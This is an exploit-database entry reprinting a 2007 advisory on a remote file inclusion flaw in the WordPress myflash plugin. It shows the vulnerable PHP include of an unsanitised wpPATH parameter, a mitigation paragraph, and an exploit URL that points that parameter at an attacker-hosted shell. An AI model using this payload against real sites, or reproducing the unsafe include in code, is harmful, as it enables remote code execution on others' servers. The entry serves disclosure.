Wordpress plugin myflash - exploit.company

vendor:

myflash plugin

by:

Crackers_Child

N/A

CVSS

HIGH

RFI

CWE

Product Name: myflash plugin

Affected Version From: 1.00

Affected Version To: 1.00

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

WordPress plugin myflash <= V1.00 (wppath) RFI Vulnerability

This exploit allows an attacker to remotely include files from the target server by manipulating the wpPATH parameter in the myflash-button.php file of the myflash plugin for Wordpress. By sending a specially crafted request, an attacker can execute arbitrary code on the target server.

Mitigation:

Update to the latest version of the myflash plugin or remove it if not needed. Ensure that user input is properly sanitized and validated before using it in include or require statements.

Source

Exploit-DB raw data:

--------------------------------- [ Oyle Kahpe Ki DÃ¼nya ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: cybermilitan@hotmail.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  Wordpress plugin

Web Site    :  http://alexrabe.boelinger.com/

--------------------------------------------------------------------------------
Vuln Ä°n  myflash-button.php

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------

greets:

Every Body

--------------------------------------------------------------------------------



--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

# milw0rm.com [2007-05-01]